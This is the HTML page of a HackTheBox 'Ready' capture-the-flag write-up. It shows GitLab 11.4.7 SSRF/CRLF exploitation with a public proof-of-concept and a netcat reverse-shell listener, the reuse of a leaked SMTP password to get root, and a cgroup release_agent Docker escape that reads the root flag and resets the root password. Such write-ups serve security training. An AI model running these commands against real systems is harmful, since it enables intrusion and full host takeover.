-
Notifications
You must be signed in to change notification settings - Fork 0
/
ready.html
107 lines (82 loc) · 30.9 KB
/
ready.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<!-- iOS Safari -->
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
<!-- Chrome, Firefox OS and Opera Status Bar Color -->
<meta name="theme-color" content="#FFFFFF">
<link rel="stylesheet" type="text/css" href="https://cdnjs.cloudflare.com/ajax/libs/KaTeX/0.11.1/katex.min.css">
<link rel="stylesheet" type="text/css"
href="https://cdnjs.cloudflare.com/ajax/libs/prism/1.19.0/themes/prism.min.css">
<link rel="stylesheet" type="text/css" href="css/SourceSansPro.css">
<link rel="stylesheet" type="text/css" href="css/theme.css">
<link rel="stylesheet" type="text/css" href="css/notablog.css">
<!-- Favicon -->
<link rel="shortcut icon" href="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Faf7d66d0-6402-4a6f-b9f5-00d2eb9e3482%2Fhackerman.gif?table=collection&id=92e319e1-0c5e-49c7-adc1-7d48fe74e022">
<style>
:root {
font-size: 20px;
}
</style>
<title>Ready - HackTheBox Writeup (10.10.10.220) | samiko@127.0.0.1~$</title>
<meta property="og:type" content="blog">
<meta property="og:title" content="Ready - HackTheBox Writeup (10.10.10.220)">
<meta name="description" content="Medium-difficulty Linux box on exploiting CVE-2018-19571 (SSRF), CVE-2018-19585 (CRLF) vulnerabilities in GitLab 11.4.7 CE. Privilege escalation by abusing the notify_on_release feature in cgroups to escape the privileged Docker container.">
<meta property="og:description" content="Medium-difficulty Linux box on exploiting CVE-2018-19571 (SSRF), CVE-2018-19585 (CRLF) vulnerabilities in GitLab 11.4.7 CE. Privilege escalation by abusing the notify_on_release feature in cgroups to escape the privileged Docker container.">
<meta property="og:image" content="https://www.hackthebox.eu/storage/avatars/d7a56d2476ef541853df356a46976f45.png">
<style>
.DateTagBar {
margin-top: 1.0rem;
}
</style>
</head>
<body>
<nav class="Navbar">
<a href="/">
<div class="Navbar__Btn">
<span><img class="inline-img-icon" src="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Faf7d66d0-6402-4a6f-b9f5-00d2eb9e3482%2Fhackerman.gif?table=collection&id=92e319e1-0c5e-49c7-adc1-7d48fe74e022"></span>
<span>Home</span>
</div>
</a>
</nav>
<header class="Header">
<div class="Header__Spacer Header__Spacer--NoCover">
</div>
<div class="Header__Icon">
<span><img class="inline-img-icon" src="https://www.hackthebox.eu/storage/avatars/d7a56d2476ef541853df356a46976f45.png"></span>
</div>
<h1 class="Header__Title">Ready - HackTheBox Writeup (10.10.10.220)</h1>
<div class="DateTagBar">
<span class="DateTagBar__Item DateTagBar__Date">Posted on Wed, May 19, 2021</span>
<span class="DateTagBar__Item DateTagBar__Tag DateTagBar__Tag--yellow">
<a href="tag/Medium">Medium</a>
</span>
<span class="DateTagBar__Item DateTagBar__Tag DateTagBar__Tag--orange">
<a href="tag/Linux">Linux</a>
</span>
<span class="DateTagBar__Item DateTagBar__Tag DateTagBar__Tag--red">
<a href="tag/Web_Application">Web Application</a>
</span>
<span class="DateTagBar__Item DateTagBar__Tag DateTagBar__Tag--blue">
<a href="tag/GitLab">GitLab</a>
</span>
<span class="DateTagBar__Item DateTagBar__Tag DateTagBar__Tag--purple">
<a href="tag/Docker">Docker</a>
</span>
</div>
<div>
Medium-difficulty Linux box on exploiting CVE-2018-19571 (SSRF), CVE-2018-19585 (CRLF) vulnerabilities in GitLab 11.4.7 CE. Privilege escalation by abusing the notify_on_release feature in cgroups to escape the privileged Docker container.
</div>
</header>
<article id="https://www.notion.so/e73ae20743fa4c0cb7563459e4dc04c8" class="PageRoot PageRoot--FullWidth"><h2 id="https://www.notion.so/e8cc55bc17fe4b34b07790d2db093963" class="ColorfulBlock ColorfulBlock--ColorDefault Heading Heading--2"><a class="Anchor" href="#https://www.notion.so/e8cc55bc17fe4b34b07790d2db093963"><svg width="16" height="16" viewBox="0 0 16 16"><path fill-rule="evenodd" d="M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z"></path></svg></a><span class="SemanticStringArray"><span class="SemanticString">Recon</span></span></h2><ul class="BulletedListWrapper"><li id="https://www.notion.so/d38dad38d3df4d4fa7f9ca92a13498e5" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Port scan:</span></span><div id="https://www.notion.so/a8bb0dd8242042148b54c29d4aaefa55" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ nmap -p- 10.10.10.220 > ports.nmap</code></span></span></p></div><div id="https://www.notion.so/693e202275284f4096cff9acf669182a" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">22, 5080 ports are open</span></span></p></div></li><li id="https://www.notion.so/af5e9bb27b82472db7333716e58f9488" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Targeted scan:</span></span><div id="https://www.notion.so/fb8cae07efbd4200858fb79660fb4cd8" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ nmap -sC -sV -p 22,5080 10.10.10.220 > scan.nmap</code></span></span></p></div><div id="https://www.notion.so/78e9e4359e32457195892c85dd24e522" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">SSH, nginx HTTP</span></span></p></div></li></ul><h2 id="https://www.notion.so/102e85b668e24417adee3ba8154b690d" class="ColorfulBlock ColorfulBlock--ColorDefault Heading Heading--2"><a class="Anchor" href="#https://www.notion.so/102e85b668e24417adee3ba8154b690d"><svg width="16" height="16" viewBox="0 0 16 16"><path fill-rule="evenodd" d="M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z"></path></svg></a><span class="SemanticStringArray"><span class="SemanticString">Enumeration</span></span></h2><ul class="BulletedListWrapper"><li id="https://www.notion.so/c3c9d659657f4eb4a01247c85e33e367" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Port 5080 is running GitLab Community Edition 11.4.7, out-of-date for 2 years.</span></span></li><li id="https://www.notion.so/7e0b6a0abeb141e19990aded767bf485" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Register and login, user can import repositories from </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">http://</code></span><span class="SemanticString"> or </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">git://</code></span><span class="SemanticString">.</span></span></li></ul><h2 id="https://www.notion.so/4278cd533650418b96a42dd039ae37e4" class="ColorfulBlock ColorfulBlock--ColorDefault Heading Heading--2"><a class="Anchor" href="#https://www.notion.so/4278cd533650418b96a42dd039ae37e4"><svg width="16" height="16" viewBox="0 0 16 16"><path fill-rule="evenodd" d="M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z"></path></svg></a><span class="SemanticStringArray"><span class="SemanticString">Exploitation</span></span></h2><ul class="BulletedListWrapper"><li id="https://www.notion.so/89accc5358fb41d8aded818571fe3f8f" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">CVE-2018-19571 (SSRF), CVE-2018-19585 (CRLF) vulnerabilities in GitLab 11.4.7 leading to remote code execution (RCE).</span></span></li><li id="https://www.notion.so/781ad23c2f5246349b302aa5712d0bbb" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">SSRF, or server-side request forgery occurs when the domain blacklist gets bypassed using defined IPv6:</span></span><div id="https://www.notion.so/9d4387436d92484bb37f4c3a5559a4cf" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">https://[0:0:0:0:0:ffff:127.0.0.1]</code></span></span></p></div></li><li id="https://www.notion.so/4d912757257446e897946d6d9c8b79f4" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Using PoC written by Shad0wQu35t on </span><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="https://github.com/mohinparamasivam/GitLab-11.4.7-Authenticated-Remote-Code-Execution/blob/main/gitlab_rce.py">GitHub</a></span><span class="SemanticString">, we can get a shell as git:</span></span><div id="https://www.notion.so/8324790b62c9405d82a61bf6c68852df" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ python3 ./gitlab_rce.py http://10.10.10.220:5080 10.10.14.53</code></span></span></p></div><div id="https://www.notion.so/94655d3c53ff4b1d84e77ed1f15b1863" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ nc -lvnp 42069</code></span></span></p></div></li><li id="https://www.notion.so/c7b731b0f0134847ba5a449fe943b189" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Get user flag!</span></span></li></ul><h2 id="https://www.notion.so/b130bb8dbb984420bfb18c385e7e6bee" class="ColorfulBlock ColorfulBlock--ColorDefault Heading Heading--2"><a class="Anchor" href="#https://www.notion.so/b130bb8dbb984420bfb18c385e7e6bee"><svg width="16" height="16" viewBox="0 0 16 16"><path fill-rule="evenodd" d="M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z"></path></svg></a><span class="SemanticStringArray"><span class="SemanticString">Privilege Escalation</span></span></h2><ul class="BulletedListWrapper"><li id="https://www.notion.so/7558a69989074da6888288faad7952ec" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Nothing useful in LinPEAS, moving on.</span></span></li><li id="https://www.notion.so/8bb1739253744e87ba4f8e13c8c8b59b" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Found </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">/root_pass</code></span><span class="SemanticString"> file:</span></span><div id="https://www.notion.so/3c4ca57f05114823a73d4613a4f4dd49" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ cat /root_pass</code></span></span></p></div><pre id="https://www.notion.so/6d50598dc1e44f17836f5544c7d247a5" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>YG65407Bjqvv9A0a8Tm_7w</span></span></span></code></pre></li><li id="https://www.notion.so/04f9af98f3264141a4c3f48a899a2518" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Found SMTP password in GitLab backup:</span></span><div id="https://www.notion.so/a6fae0ead7ca40b880f034459156cb76" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ cat /opt/backup/gitlab.rb | grep pass</code></span></span></p></div><pre id="https://www.notion.so/601133eae3c346ffb3523880b759f851" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>gitlab_rails['smtp_password'] = "wW59U!ZKMbG9+*#h"</span></span></span></code></pre></li><li id="https://www.notion.so/abaa0e4f0b6047b0928bb6ebb764d8b1" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Try to su into root:</span></span><div id="https://www.notion.so/03c523e018db4cf888e2ad02cefd8abc" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ su</code></span></span></p></div><pre id="https://www.notion.so/c8ea4bd110f7476f9dfccaa6773ab068" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>su: must be run from a terminal</span></span></span></code></pre></li><li id="https://www.notion.so/ca74d2b2525a4f148503b373a4bb5197" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Cannot run su/sudo in Docker container, spawn pty shell:</span></span><div id="https://www.notion.so/d27f24c72de0438b8f836918911bb1b5" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ echo "import pty; pty.spawn('/bin/bash')" > /tmp/shell.py</code></span></span></p></div><div id="https://www.notion.so/ef75bffc94764b70955737c8aadbb394" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ python3 /tmp/shell.py</code></span></span></p></div></li><li id="https://www.notion.so/0d2fde6bdb3a42c191a1d578a10d9f62" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Now in the pseudo shell, run su with </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">stmp_password</code></span><span class="SemanticString">:</span></span><div id="https://www.notion.so/7331bc14356b46589c0a5a1941c4edbf" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ su</code></span></span></p></div><div id="https://www.notion.so/115bcf18340b4000a97a4ca3c042e9ac" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">wW59U!ZKMbG9+*#h</code></span></span></p></div></li><li id="https://www.notion.so/a55f030454754d19951119ca57f517a8" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Gained root access... but we're still in the Docker container. We can "escape" by abusing the </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">notify_on_release</code></span><span class="SemanticString"> feature in cgroups v1 to execute our payload as root. When the last task in a cgroup exits, the </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">release_agent</code></span><span class="SemanticString"> file is executed.</span></span><div id="https://www.notion.so/55237757126048ceaac6f5328c305b03" class="ColorfulBlock ColorfulBlock--BgGray Callout"><div class="Callout__Icon"><div class="Icon">◽</div></div><p class="Callout__Content"><span class="SemanticStringArray"><span class="SemanticString"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><em class="SemanticString__Fragment SemanticString__Fragment--Italic">1.4 What does notify_on_release do?</em></strong></span><span class="SemanticString"><em class="SemanticString__Fragment SemanticString__Fragment--Italic">
</em></span><span class="SemanticString">If the notify_on_release flag is enabled (1) in a cgroup, then whenever the last task in the cgroup leaves (exits or attaches to some other cgroup) and the last child cgroup of that cgroup is removed, then the kernel runs the command specified by the contents of the “release_agent” file in that hierarchy’s root directory, supplying the pathname (relative to the mount point of the cgroup file system) of the abandoned cgroup. This enables automatic removal of abandoned cgroups. The default value of notify_on_release in the root cgroup at system boot is disabled (0). The default value of other cgroups at creation is the current value of their parents’ notify_on_release settings. The default value of a cgroup hierarchy’s release_agent path is empty.</span></span></p></div></li><li id="https://www.notion.so/acc1dcc122b04fd1a8156761672493b8" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Create cgroup directory, mount RDMA cgroup controller, and create child cgroup </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">x</code></span><span class="SemanticString">:</span></span><div id="https://www.notion.so/d81c020cf1c84dabae771a4d798bb790" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ mkdir ./cgrp && mount -t cgroup -o rdma cgroup ./cgrp && mkdir ./cgrp/x</code></span></span></p></div></li><li id="https://www.notion.so/98e2ac85543448319af96d660c86a0c6" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Enable cgroup notifications on release of </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">x</code></span><span class="SemanticString"> cgroup by writing </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">1</code></span><span class="SemanticString"> to its </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">notify_on_release</code></span><span class="SemanticString"> file:</span></span><div id="https://www.notion.so/4794bab8031041688f08c5c8c450f2b6" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ echo 1 > ./cgrp/x/notify_on_release</code></span></span></p></div></li><li id="https://www.notion.so/7df261f49a954b39a4de3353d7419bbd" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Grab container's path on the host from </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">/etc/mtab</code></span><span class="SemanticString"> as </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$host_path</code></span><span class="SemanticString">:</span></span><div id="https://www.notion.so/e50ebdc919c74acd8e2d2c092a6199e7" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`</code></span></span></p></div></li><li id="https://www.notion.so/afe08df7057749cfb43260a0248013b2" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Set RDMA cgroup release agent to execute a </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">/cmd</code></span><span class="SemanticString"> script in the container:</span></span><div id="https://www.notion.so/b88b4458f87248e184957273dba4e105" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ echo "$host_path/cmd" > ./cgrp/release_agent</code></span></span></p></div></li><li id="https://www.notion.so/10a6e338c32749d5b80dd1a1b4791cf0" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Specify </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">/cmd</code></span><span class="SemanticString"> payload to print the root flag to </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">/output</code></span><span class="SemanticString"> in the container:</span></span><div id="https://www.notion.so/8386025eb97b436391705666d9a45685" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ echo ‘#!/bin/sh’ > /cmd</code></span></span></p></div><div id="https://www.notion.so/e6327789a76842c0817e4cf695768a85" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ echo "cat /root/root.txt > $host_path/output" >> /cmd</code></span></span></p></div></li><li id="https://www.notion.so/91f057a7b4ef41dabdf75cd60bd35d17" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Set file permissions:</span></span><div id="https://www.notion.so/417af2daf2b54df6889c03da222d9ee9" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ chmod a+x /cmd</code></span></span></p></div></li><li id="https://www.notion.so/8a91b74ce80146f3aa0eeb845bb788f5" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Execute by spawning a process that immediately ends to trigger the cgroup release agent:</span></span><div id="https://www.notion.so/064ff8b4205448ae86fea7365025dd49" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ sh -c “echo \$\$ > ./cgrp/x/cgroup.procs”</code></span></span></p></div></li><li id="https://www.notion.so/b5fd5d9164f64a6d869dcfc8692209ea" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Get root flag!</span></span></li></ul><h2 id="https://www.notion.so/e0b08b3ba48447248fb0f95470ace992" class="ColorfulBlock ColorfulBlock--ColorDefault Heading Heading--2"><a class="Anchor" href="#https://www.notion.so/e0b08b3ba48447248fb0f95470ace992"><svg width="16" height="16" viewBox="0 0 16 16"><path fill-rule="evenodd" d="M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z"></path></svg></a><span class="SemanticStringArray"><span class="SemanticString">Persistence</span></span></h2><ul class="BulletedListWrapper"><li id="https://www.notion.so/39da063f4ad24868bc96fd8d424042c8" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Specify second </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">/cmd</code></span><span class="SemanticString"> payload to change the root password:</span></span><div id="https://www.notion.so/8d51316dc3654c3a94b5c1fad22a2625" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ echo '#!/bin/sh' > /cmd</code></span></span></p></div><div id="https://www.notion.so/9441164bd2d6403c9d2083994c4b38a9" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ echo "echo 'root:areyouready' | chpasswd" >> /cmd</code></span></span></p></div><div id="https://www.notion.so/618572652aea4f429c8783217640f5f7" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ chmod a+x /cmd</code></span></span></p></div><div id="https://www.notion.so/9df3bd7163524b95982d281cc6816fa6" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ sh -c “echo \$\$ > ./cgrp/x/cgroup.procs”</code></span></span></p></div></li><li id="https://www.notion.so/1e3284d212b1476c8e03bd4a19682821" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">SSH into root:</span></span><div id="https://www.notion.so/f120db29b99949b388210e61e15399ca" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ ssh root@10.10.10.220</code></span></span></p></div></li></ul><h2 id="https://www.notion.so/3d5f2297f43f43e58001ed165a1940ac" class="ColorfulBlock ColorfulBlock--ColorDefault Heading Heading--2"><a class="Anchor" href="#https://www.notion.so/3d5f2297f43f43e58001ed165a1940ac"><svg width="16" height="16" viewBox="0 0 16 16"><path fill-rule="evenodd" d="M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z"></path></svg></a><span class="SemanticStringArray"><span class="SemanticString">Resources</span></span></h2><ol class="NumberedListWrapper"><li id="https://www.notion.so/c5941f6001ce458ebc4a43227ba7b3d8" class="NumberedList" value="1"><span class="SemanticStringArray"><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/">https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/</a></span></span></li><li id="https://www.notion.so/1c05d359082d43628052eba5eb92b391" class="NumberedList" value="2"><span class="SemanticStringArray"><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="https://www.youtube.com/watch?v=LrLJuyAdoAg">https://www.youtube.com/watch?v=LrLJuyAdoAg</a></span></span></li><li id="https://www.notion.so/e4233176e5954f948b54a76841ded6b1" class="NumberedList" value="3"><span class="SemanticStringArray"><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="https://github.com/dotPY-hax/gitlab_RCE/blob/main/gitlab_rce.py">https://github.com/dotPY-hax/gitlab_RCE/blob/main/gitlab_rce.py</a></span></span></li><li id="https://www.notion.so/b116475105aa4e44949c20c0c80155c7" class="NumberedList" value="4"><span class="SemanticStringArray"><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="https://medium.com/better-programming/escaping-docker-privileged-containers-a7ae7d17f5a1">https://medium.com/better-programming/escaping-docker-privileged-containers-a7ae7d17f5a1</a></span></span></li><li id="https://www.notion.so/22c243b00a8a4def942230f171e0b040" class="NumberedList" value="5"><span class="SemanticStringArray"><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="https://book.hacktricks.xyz/linux-unix/privilege-escalation/escaping-from-a-docker-container#sys_admin-capability-and-apparmor-disabled">https://book.hacktricks.xyz/linux-unix/privilege-escalation/escaping-from-a-docker-container#sys_admin-capability-and-apparmor-disabled</a></span></span></li><li id="https://www.notion.so/1dda8f1214d14d048d92e1b4358963a1" class="NumberedList" value="6"><span class="SemanticStringArray"><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="https://ajxchapman.github.io/containers/2020/11/19/privileged-container-escape.html">https://ajxchapman.github.io/containers/2020/11/19/privileged-container-escape.html</a></span></span></li></ol><div id="https://www.notion.so/ddfb7ff4f7ba43f2832163999152e5f1" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"></span></p></div></article>
<footer class="Footer">
<div>samiko@127.0.0.1~$</div>
<div>·</div>
<div>Powered by <a href="https://github.com/dragonman225/notablog" target="_blank" rel="noopener noreferrer">Notablog</a>.</div>
</footer>
</body>
</html>